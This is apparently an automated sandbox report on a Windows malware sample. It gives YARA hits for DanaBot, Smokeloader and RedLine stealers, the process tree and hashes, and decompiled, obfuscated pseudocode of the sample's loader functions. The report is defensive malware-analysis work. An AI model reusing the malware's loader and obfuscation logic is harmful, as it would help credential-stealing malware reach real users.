Yara matches:	Rule: JoeSecurity_DanaBot_stealer_dll_1, Description: Yara detected DanaBot stealer dll, Source: 00000000.00000002.274015808.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.274015808.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DanaBot_stealer_dll_1, Description: Yara detected DanaBot stealer dll, Source: 00000000.00000003.266020343.0000000005070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.271176444.0000000004BC8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 9NSV9PY6HS.exePID: 4424, Parent PID: 5672

General

Target ID:	1
Start time:	14:52:34
Start date:	17/01/2023
Path:	C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe"
Imagebase:	0x400000
File size:	1414144 bytes
MD5 hash:	358819C5567152065484C562A55074E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.295927024.0000000004B00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.295429309.00000000049C7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1756, Parent PID: 5672

General

Target ID:	2
Start time:	14:52:34
Start date:	17/01/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp",Wpfprp
Imagebase:	0xc20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: notepad.exePID: 4864, Parent PID: 4424

General

Target ID:	5
Start time:	14:52:45
Start date:	17/01/2023
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\notepad.exe
Imagebase:	0x7ff7296f0000
File size:	245760 bytes
MD5 hash:	BB9A06B8F2DD9D24C77F389D7B2B58D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 676, Parent PID: 4864

General

Target ID:	13
Start time:	14:52:51
Start date:	17/01/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	chrome.exe" --no-first-run --no-default-browser-check --noerrdialogs --disable-crash-reporter --disable-backgrounding-occluded-windows --disable-background-timer-throttling --disable-extensions-http-throttling --disable-renderer-backgrounding --disable-audio-output --silent-launch --restore-last-session --elevated --profile-directory="Default
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5188, Parent PID: 676

General

Target ID:	14
Start time:	14:52:53
Start date:	17/01/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=1940 --field-trial-handle=1744,i,634409509327282081,5410595586115948395,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: GoogleUpdateBroker.exePID: 6948, Parent PID: 800

General

Target ID:	15
Start time:	14:53:07
Start date:	17/01/2023
Path:	C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleUpdateBroker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleUpdateBroker.exe" -Embedding
Imagebase:	0xb20000
File size:	114872 bytes
MD5 hash:	4B2EED3642582E2CCF7D9B928C1CC9E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 9nSv9py6hs.exePID: 5672, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.2%
Total number of Nodes:	42
Total number of Limit Nodes:	5

Executed Functions

Function 005FE33C Relevance: 26.8, APIs: 1, Strings: 14, Instructions: 517
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

srcore.dll, xrefs: 005FE41C
CreateDisc.dll, xrefs: 005FE802
NetMessageNameGetInfo, xrefs: 005FEAAA
'op, xrefs: 005FE7A6
_fltused, xrefs: 005FEEEC
&O4, xrefs: 005FE6B2
RtlIpv4StringToAddressW, xrefs: 005FE956
api-ms-win-core-memory-l1-1-0.dll, xrefs: 005FE761
?, xrefs: 005FE76B
vU5, xrefs: 005FE4EC
dwmcore.dll, xrefs: 005FEF2E
IEShims.dll, xrefs: 005FE381
api-ms-win-core-processthreads-l1-1-0.dll, xrefs: 005FE8A1
LdrHotPatchRoutine, xrefs: 005FE910, 005FE9FF

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: &O4$'op$CreateDisc.dll$IEShims.dll$LdrHotPatchRoutine$NetMessageNameGetInfo$RtlIpv4StringToAddressW$_fltused$api-ms-win-core-memory-l1-1-0.dll$api-ms-win-core-processthreads-l1-1-0.dll$dwmcore.dll$srcore.dll$vU5$ ?
API String ID: 0-494442018
Opcode ID: d4f30cdc9a834b67ae27596e4f0c4c41ba9d090746f841ed10288098671e6637
Instruction ID: 26fd04af84f145c6022bd8ba878e3d81492e350913dbc96d3d3f41ec78001fa6
Opcode Fuzzy Hash: d4f30cdc9a834b67ae27596e4f0c4c41ba9d090746f841ed10288098671e6637
Instruction Fuzzy Hash: D7121275A1474A8FCB01DFB8E8952DD3FB3FB29321F04522ACA41A7B62E6780946C751

Uniqueness

Uniqueness Score: -1.00%

Function 005FF89B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32 ref: 005FF8EA

Strings

hpz3lw71.dll, xrefs: 005FF900
d3d10core.dll, xrefs: 005FF910

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AcquireContextCrypt
String ID: d3d10core.dll$hpz3lw71.dll
API String ID: 3951991833-2155237407
Opcode ID: 1d75ddb85d0b7afaf36bd95a777ee6ec1a07dc1c5df8ceb433e0635716041e81
Instruction ID: cd799ebb0a964a0c1ce1071f6b6cfddeee957b6450722405d4846ebdad4c791a
Opcode Fuzzy Hash: 1d75ddb85d0b7afaf36bd95a777ee6ec1a07dc1c5df8ceb433e0635716041e81
Instruction Fuzzy Hash: 1C01DFB4E80709AFCB01DFA4DC907D97FB2FB79322F04516A9680A3712D27C4A45C712

Uniqueness

Uniqueness Score: -1.00%

Function 00620B5F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 154
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00620CD1

Strings

rpcref.dll, xrefs: 00620CEE
WW6, xrefs: 00620D43
CreateDisc.dll, xrefs: 00620CB9
ncobjapi.dll, xrefs: 00620CE1

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: FileWrite
String ID: CreateDisc.dll$WW6$ncobjapi.dll$rpcref.dll
API String ID: 3934441357-2998409174
Opcode ID: 7b644ecafda6cbf620e9edf7852b20ad545165cf109998f516478e1fd1588e08
Instruction ID: 86e4adf5b369b5fcbc82c9aa5f29e28f81ac371dcf7089d2f4cca83085fc0f47
Opcode Fuzzy Hash: 7b644ecafda6cbf620e9edf7852b20ad545165cf109998f516478e1fd1588e08
Instruction Fuzzy Hash: 6C5114BA6047828FD712DFF9FC646C43F73E729312F08661AC844A7762E6240402DB66

Uniqueness

Uniqueness Score: -1.00%

Function 005B70C5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 124
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 005B71EB

Strings

ehui.dll, xrefs: 005B7250
LdrHotPatchRoutine, xrefs: 005B714C
GetDlgItem, xrefs: 005B7237

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: LibraryLoad
String ID: GetDlgItem$LdrHotPatchRoutine$ehui.dll
API String ID: 1029625771-3423274897
Opcode ID: 5cd4db7f772a895794444a168d1f7fa740494c964d0b190b48318b89ed12cbf9
Instruction ID: bbb190743355a21d89a4c6f604270a7f415c78d21950bc99c36aefcb113a5e22
Opcode Fuzzy Hash: 5cd4db7f772a895794444a168d1f7fa740494c964d0b190b48318b89ed12cbf9
Instruction Fuzzy Hash: 4041E1B5E1434A9FCB00DFB8E8D56DDBFB2FB19320F04426AC944AB752E2740A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005B761B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 005B7660

Strings

RtlIpv4StringToAddressW, xrefs: 005B76A3
d3d10core.dll, xrefs: 005B76BA
ncobjapi.dll, xrefs: 005B7691

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: LibraryLoad
String ID: RtlIpv4StringToAddressW$d3d10core.dll$ncobjapi.dll
API String ID: 1029625771-4090397453
Opcode ID: 4d46b21e1a475e594e28bb9bf53afb872121a00680e61107f91418fdd3f736d2
Instruction ID: 1dae39c55bf54b922609f5712a6e6dbe3e2c7d9e774c3aed68cc484eb51ceba6
Opcode Fuzzy Hash: 4d46b21e1a475e594e28bb9bf53afb872121a00680e61107f91418fdd3f736d2
Instruction Fuzzy Hash: 43114678E1070AAFCB10DFB9E9846CDBFB2EB6C311F00557AE944EB755E6705A808B50

Uniqueness

Uniqueness Score: -1.00%

Function 005F376E Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000001,?,00000000), ref: 005F3823

Strings

?@, xrefs: 005F37DB
ehui.dll, xrefs: 005F37A1
d3d10core.dll, xrefs: 005F37B0

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AllocVirtual
String ID: ?@$d3d10core.dll$ehui.dll
API String ID: 4275171209-2350757939
Opcode ID: 545cb49dbb085d69be1bd9a48759fc401d8ccb12fa31b4bb658c9b4197bcb70b
Instruction ID: ebfca79f66d04997a8182bb149e0a3eeaa885d430a227d5aaeccf18897625ea0
Opcode Fuzzy Hash: 545cb49dbb085d69be1bd9a48759fc401d8ccb12fa31b4bb658c9b4197bcb70b
Instruction Fuzzy Hash: 5A0149B0702B024BE710FF78ACA17D92F63EB6A351F044230DA55AB3D6DA6A4D058796

Uniqueness

Uniqueness Score: -1.00%

Function 006540B2 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E006540B2() {
				signed char _t8;
				void* _t10;
				signed char _t13;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				unsigned short _t24;
				intOrPtr _t31;
				void* _t38;

				 *(_t38 - 8) = _t8;
				_t31 =  *0x6581cc; // 0x129e
				_t10 = L0062DDD9(0x8410, _t31);
				_push(1);
				_push(0);
				_push(0);
				 *0x65afd9 = L005B505E(_t10);
				_t13 =  *(_t38 - 8);
				_t19 = _t18 - 0x2d55;
				 *0x658bd1 = _t19;
				if(_t19 > _t19 || 0x8410 == 0x8410) {
					_t31 = _t31 - 0xae;
					if((_t13 & 0x000000b6) >= 0) {
						_t24 = _t13 + 0xf >> 0x8410;
						if(_t13 > 0x2e60) {
							_t24 = 0x37bcf5;
						}
						 *0x658f91 = _t24;
					}
				}
				_t20 =  *0x658c4d; // 0x0
				 *0x658ead =  *0x658ead + _t20;
				 *(_t38 - 8) = _t13;
				 *0x6583dd =  *0x6583dd - 0xfa;
				 *0x65863d = 0xfa;
				ExitProcess(0);
			}

0x006540b5
0x006540bb
0x006540c4
0x006540c9
0x006540cb
0x006540cd
0x006540d4
0x006540dd
0x006540e0
0x006540e5
0x006540ed
0x00654104
0x0065410a
0x0065411d
0x00654124
0x00654126
0x00654126
0x0065412b
0x00654138
0x0065410a
0x00654141
0x00654147
0x0065414d
0x00654156
0x0065415c
0x00654164

APIs

ExitProcess.KERNEL32 ref: 00654164

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 380cc33af60ceb18922702122d8b7bb16aed7eb3b92dba77e1a720566d9db979
Instruction ID: f65db04ed5731cc9df72a39e94acb2ed603b02e8c19e12b08d92fb520c09e73e
Opcode Fuzzy Hash: 380cc33af60ceb18922702122d8b7bb16aed7eb3b92dba77e1a720566d9db979
Instruction Fuzzy Hash: 7111E5369007029FC710EF78EC993D97BB3E729716F0491A9C559A3BA6DE7104818B50

Uniqueness

Uniqueness Score: -1.00%

Function 005FB909 Relevance: 1.3, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E005FB909(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v12;
				CHAR* _v16;
				void* __ebp;
				long _t14;
				CHAR* _t15;
				void* _t19;
				void* _t20;

				_v16 = 0;
				_t14 = _a8 + _a8;
				_v8 = _t14;
				_v12 = _t14;
				_push(_v12);
				_t15 = E005F3625(_t19, _t20, _t14); // executed
				_v16 = _t15;
				L005FB899(_v16, _a4, _a8);
				CharUpperBuffA(_v16, _v8); // executed
				return _v16;
			}

0x005fb90f
0x005fb919
0x005fb91b
0x005fb91e
0x005fb921
0x005fb924
0x005fb929
0x005fb935
0x005fb940
0x005fb94a

APIs

CharUpperBuffA.USER32(00000000,?,?), ref: 005FB940

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: e4bb9086192cd00563257434760b71e9a20e8d294205a5573be72a688af22ea8
Instruction ID: 82cf27ec485b32cd7189befdc0eec00a41f23f524f01e15c730a1fbf556dd5d4
Opcode Fuzzy Hash: e4bb9086192cd00563257434760b71e9a20e8d294205a5573be72a688af22ea8
Instruction Fuzzy Hash: 9AF0AE75C0020CFFDF01DFA8D845A9CBFB6FF04314F1081A1A928A6260E7368B20AF40

Uniqueness

Uniqueness Score: -1.00%

Function 00611ADF Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00611ADF(wchar_t* _a4, intOrPtr _a8) {
				wchar_t* _v8;
				void* __ebp;
				void* _t5;
				wchar_t* _t6;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t11;

				_t6 = L00633C1E(_t5, _t8, _t9, _t10, _t11, _a8); // executed
				_v8 = _t6;
				return wcscat(_a4, _v8);
			}

0x00611ae8
0x00611aed
0x00611b00

APIs

wcscat.MSVCRT ref: 00611AF6

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: wcscat
String ID:
API String ID: 1642202255-0
Opcode ID: 57c737e9e4a76e3c0e1a1f7e0eb6e09bd2025d5134f4d946ba46aa2d6ce6153b
Instruction ID: 4172a701c851fca644b3f681aa836b3ff50e42fb7f76843de3fe82675ffc9b4d
Opcode Fuzzy Hash: 57c737e9e4a76e3c0e1a1f7e0eb6e09bd2025d5134f4d946ba46aa2d6ce6153b
Instruction Fuzzy Hash: 20D0C930804108EBCF41AF64ED0689D7A66AB00355F148220B855E52B2EB328B30AB95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 006376A9 Relevance: 24.7, APIs: 1, Strings: 15, Instructions: 701
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E006376A9(signed int __ecx, void* __edi, short __esi) {
				signed char _t168;
				signed char _t177;
				signed char _t181;
				signed char _t183;
				signed char _t185;
				signed char _t188;
				signed char _t193;
				signed char _t203;
				signed char _t212;
				signed char _t219;
				signed char _t222;
				signed char _t225;
				signed char _t227;
				signed char _t228;
				signed char _t229;
				signed char _t231;
				signed char _t234;
				char* _t235;
				intOrPtr _t237;
				char* _t239;
				intOrPtr _t243;
				void* _t263;
				intOrPtr _t265;
				char* _t278;
				char* _t299;
				signed char _t313;
				intOrPtr _t314;
				char* _t325;
				char* _t336;
				void* _t338;
				signed int _t349;
				void* _t353;
				signed char _t390;
				short _t391;
				signed char _t394;
				signed char _t398;
				intOrPtr _t399;
				signed char _t416;
				signed char _t426;
				signed char _t427;
				signed char _t432;
				signed int _t440;
				intOrPtr _t449;
				intOrPtr _t451;
				short _t458;
				short _t463;
				signed int _t469;
				signed int _t470;
				intOrPtr _t471;
				void* _t474;
				intOrPtr* _t477;
				void* _t479;
				signed int _t480;
				signed int _t484;
				void* _t487;
				signed int _t490;
				signed short _t493;
				short _t498;
				signed int _t509;
				void* _t522;

				_t487 = __edi;
				 *0x658244 = __esi;
				_t493 = __esi + __esi;
				 *(_t522 - 8) =  *( *(_t522 - 8) + 0x18);
				 *(_t522 - 0xc) = (0x23418b >> __ecx) + 0x3a;
				 *(_t522 - 0x10) =  *(_t522 - 0x14);
				_t440 =  !0x8fe5;
				if(0xa0 >= 0) {
					 *0x65a587 =  *0x65a587 + _t493;
					 *0x65afd9 = 0xba;
					 *0x65874d =  *0x65874d - __edi;
				}
				_t168 =  *(_t522 - 8);
				_t259 = 0x496c74;
				 *0x659159 = 0x496c74;
				_t383 =  *(_t522 - 0x10);
				 *(_t522 - 0x34) = _t168;
				if((_t493 & 0x0000b186) != 0) {
					L8:
					goto L9;
				} else {
					_t259 = 0x496bb0;
					if(_t493 < 0) {
						L11:
					} else {
						 *0x65afd9 =  *0x65afd9 + _t168;
						if(_t487 >= 0) {
							if(_t487 < 0) {
								 *0x658431 = _t168;
								_t259 = 0x19cc62;
							}
							 *0x658090 =  *0x658090 + _t259;
							goto L8;
						}
						L9:
						 *0x65afce =  *0x65afce + _t383;
						 *0x65814a = _t383;
						 *0x65afd1 =  *0x65afd1 - 0x7b60;
						 *0x6581e6 = 0x7b60;
						_t440 = 0x99150a;
						if((_t168 & 0x000000b5) == 0) {
							goto L11;
						}
					}
				}
				if( *(_t522 - 0x34) == 0) {
					_t263 = 0xc97bd - _t168;
					if( *(_t522 - 0x30) == 0xffffffff) {
						if(_t263 < _t383) {
							L58:
							_t493 =  !_t493;
							L59:
							_push(0x7f);
							_t263 = 0xe0746;
							 *(_t522 - 8) = _t168;
							_push(0x637ee8);
							_t168 = E0061719A;
							goto __eax;
						}
						_t383 = 0x6447;
						if(0x6447 < 0x6447) {
							goto L59;
						}
						_t383 = 0x6447 + _t440;
						goto L58;
					}
					if(_t487 >= 0) {
						 *0x65b022 =  *0x65b022 - _t487;
						 *0x65afc6 =  *0x65afc6 + _t168;
						_t313 = _t168;
						if(_t168 < 0x1c1559) {
							 *0x65afc9 =  *0x65afc9 - _t313;
							 *0x658152 = _t383;
							_t383 = _t383 + _t383 + _t383 + _t383;
						}
						 *0x6581f0 = 0x8db1;
						_t314 =  *0x65afd5; // -53
						 *0x65afd8 = _t168;
						_t493 = _t493 - _t487;
						_t263 = _t314 - _t168 + 0xe8;
					}
					 *0x65afdb =  *0x65afdb - _t168;
					 *0x65afdc = _t168;
					if(_t168 > 0xbc2f) {
						L66:
						_t265 = _t263 + _t263 - 0x47c7;
						 *0x658108 =  *0x658108 + _t265;
					} else {
						_t265 = 0x1d0538;
						if(_t168 >= 0x24177a) {
							goto L66;
						}
					}
					 *(_t522 - 8) =  *(_t522 - 0x30);
					 *0x658b5d = _t265;
					if(_t265 != 0x41fc) {
						 *(_t522 - 0x10) =  *(_t522 - 0x10) - 0x424042;
					}
					 *(_t522 - 0xc) = "Heap32ListNext" + "Heap32ListNext";
					 *(_t522 - 0x10) =  *(_t522 - 0x40);
					 *0x65816c = 0x792d;
					_t177 =  *(_t522 - 8);
					 *(_t522 - 8) = _t177;
					if(_t177 > 0x28) {
						 *0x6590ed = 0x46ef9d;
						 *0x6596d9 =  *0x6596d9 + 0x99c2;
						if(0x80 == 0) {
							 *0x65afd6 = _t177;
						}
					}
					_t181 =  *(_t522 - 8);
					_t390 =  *(_t522 - 0x10);
					if(_t181 <=  *((intOrPtr*)(_t390 + 0x14))) {
						_t391 = _t522 - 0x14;
						 *0x6581e2 = 0x99c2;
						_t449 =  *0x658234; // 0xcaff
						_t278 = "GetDlgItem" - 0xb4;
						 *(_t522 - 8) = _t181;
						if(_t181 < 0x23de) {
							if(_t278 >= 0x2e4fa0) {
							}
							_t278 = "srcore.dll";
							_t391 =  *0x658148; // 0xa475
						}
						 *0x658196 = _t391;
						 *0x659c51 =  *0x659c51 - _t449 - 0x832abb;
						_t183 =  *(_t522 - 0x2c);
						if(_t278 < 0x36) {
							_t278 = 0x4c7867;
						}
						 *0x65afd1 =  *0x65afd1 + _t391 + 0x7caf;
						 *(_t522 - 8) = _t183;
						_t185 =  *(_t522 - 8);
						_t394 =  *(_t522 - 0x40);
						 *0x65afd6 =  *0x65afd6 - _t185;
						 *(_t522 - 8) = _t185;
						_t451 =  *0x658140; // 0x701d
						 *(_t522 - 0x14) = _t394;
						 *0x65818c = _t394;
						_t188 =  *(_t522 - 8);
						if(_t188 >= 0xa) {
							if(_t188 >= 0x2240) {
							}
							 *0x658142 =  *0x658142 + _t394;
							 *0x65afd2 =  *0x65afd2 + _t451;
						}
						 *0x65afd8 =  *0x65afd8 + _t188;
						 *(_t522 - 0xc) = _t188 - 0xe3;
						 *(_t522 - 0x10) =  *( *(_t522 - 0x14) + 0x1c);
						 *(_t522 - 8) = _t188;
						_t398 =  *(_t522 - 0x10);
						_t193 =  *(_t522 - 8) + _t398;
						 *0x65afd8 = _t193;
						 *(_t522 - 8) = _t193;
						 *(_t522 - 0x10) = _t398;
						_t399 =  *0x65813e; // 0x66ce
						 *0x65818a = _t399 + 1;
						_t458 =  *0x6581da; // 0x48a9
						 *0x65822e = _t458;
						_push(1);
						_push(0xffffffffffff32f4);
						_push(0);
						_push(E00638431);
						_push(L0061BCFA);
						return _t193 + _t193 + _t193 + _t193;
					} else {
						if((_t493 & 0x0000bad0) == 0) {
							 *0x65afda = _t181;
							if(_t487 >= 0) {
								goto L76;
							}
						}
						 *0x65afce =  *0x65afce + _t390;
						if(_t390 > _t390) {
							_t463 =  *0x65819c; // 0x169d
							 *0x6581ea = _t463;
							 *0x658208 = _t463;
							if(_t181 > 0) {
							}
						}
						 *0x65afdc = _t181;
						_t299 = _t181;
						 *0x6585ed = _t181;
						SetLastError(0x7f);
						 *(_t522 - 8) = _t181;
						if(_t181 <= 0x2470) {
							_t299 = 0x65afca;
							 *0x6580fc =  *0x6580fc - 0x65afca;
							 *(_t522 - 0x10) = 0x65afca;
						}
						 *(_t522 - 0xc) = _t299;
						return 0;
					}
				} else {
					 *(_t522 - 0x10) = _t383;
					 *(_t522 - 0x14) = _t383;
					 *(_t522 - 8) = _t168;
					_t325 = "GetThreadWaitChain" + "GetThreadWaitChain";
					_t469 = _t383 + 0xaa1d;
					 *(_t522 - 0x10) =  *(_t522 - 0x5c);
					 *0x65819a = 1;
					_t203 = 0x294d7d;
					 *(_t522 - 0xc) = _t325;
					if(_t325 == 0x377201) {
						L16:
						if((_t203 & 0x000000af) > 0) {
							 *0x65afd8 = _t203;
						}
						_t203 = 0xe7;
					} else {
						 *0x658150 = 0x5d5b;
						if((_t469 & 0x00008caa) <= 0) {
							 *0x65afd2 =  *0x65afd2 + _t469;
							_t469 = _t469 + _t469;
							goto L16;
						}
					}
					_t416 =  *(_t522 - 0x10);
					_t470 = _t469 ^ 0x00b18826;
					_t498 = _t493 + _t493;
					 *(_t522 - 8) =  *(_t522 - 0x2c);
					 *(_t522 - 0x10) = _t416;
					_push(_t416);
					L0062BC45("CreateDisc.dll");
					_t417 = _t416 + 0x64af2c;
					if(_t416 + 0x64af2c == _t416 + 0x64af2c) {
						 *0x6581c2 = _t470;
					}
					_t471 =  *0x6581f8; // 0x14bf
					_t212 =  *(_t522 - 8);
					 *(_t522 - 8) = _t212;
					 *(_t522 - 8) = _t212;
					L0061BD6D("api-ms-win-core-errorhandling-l1-1-0.dll", _t417, _t471 - 0xa774, _t487, _t498);
					 *(_t522 - 0x14) =  *(_t522 - 0x14) - 0x696c;
					 *0x658190 = 0x696c;
					_push( *((intOrPtr*)(_t522 - 0x38)));
					 *0x658238 = _t498;
					 *0x6580b0 =  *0x6580b0 -  *(_t522 - 0xc);
					_pop(_t474);
					_t219 = 0x28c99f;
					_t477 = _t474;
					 *0x658240 = _t477;
					if(0x97 >= 0) {
						_t219 = 0xd0;
						 *0x65afda = 0xd0;
					}
					_t490 = _t487 - 0xda82ac;
					 *0x65afc7 =  *0x65afc7 + _t219 + 1;
					_t222 =  *(_t522 - 8);
					_push( *(_t522 - 0x10));
					_push( *_t477);
					 *0x65afd6 = _t222;
					 *(_t522 - 8) = _t222;
					_t225 =  *(_t522 - 8);
					_t336 = "GetThreadWaitChain";
					if(_t336 < _t336) {
					}
					 *(_t522 - 8) = _t225;
					_t227 =  *(_t522 - 8);
					 *(_t522 - 0xc) =  &(( *(_t522 - 0xc))[_t336]);
					 *(_t522 - 8) = _t227;
					E005B4611();
					_t228 =  *(_t522 - 8);
					_t479 = _t227;
					_pop(_t426);
					_t480 = _t479 + _t228;
					_t338 = 0xb6;
					 *(_t522 - 8) = _t228;
					if(_t228 < 0x2e) {
						_t338 = 0xffffffffffffffba;
						 *0x658100 =  *0x658100;
						if(_t426 < _t426) {
							 *(_t522 - 0x14) =  *(_t522 - 0x14) + _t426;
							 *0x6581b6 = _t480;
						}
					}
					 *0x65afd6 = _t228;
					_t229 = _t228 + 0xcf;
					 *0x65afd9 =  *0x65afd9 - _t229;
					if(_t229 <= 0) {
						_t490 = _t490 + _t490;
						_t229 =  *0x65afdc; // -49
						 *0x6585c1 = _t229;
					}
					 *0x6580b4 =  *0x6580b4 - _t338;
					_t231 =  *(_t522 - 8);
					 *(_t522 - 0x50) = _t426;
					if(_t426 == _t426) {
						 *0x6581bc = _t480;
					}
					 *0x65afd6 = _t231;
					 *(_t522 - 8) = _t231;
					 *(_t522 - 0xc) = "GetThreadWaitChain";
					_t343 =  *(_t522 - 0x10);
					 *(_t522 - 0x10) = _t426;
					 *0x65818c = _t426;
					_t509 =  *0x6581c2; // 0x9d6c
					_t234 =  *(_t522 - 8);
					_t427 =  *(_t522 - 0x10);
					_push( *(_t522 - 0x50));
					if(_t490 != 0x378da) {
						L37:
						 *0x65821c =  *0x65821c + _t480;
						if(_t509 > 0) {
							 *0x65834b =  *0x65834b - _t509;
							 *0x65afda = _t234;
						}
						goto L39;
					} else {
						_t349 = _t343 | 0x00119d5f;
						if(_t234 < 0x2368) {
							_t343 = 0x3c0aec >> _t427;
							if(0x3c0aec >> _t427 < _t427) {
								_t509 = _t480;
								goto L37;
							}
							L39:
							 *0x65855d = _t234;
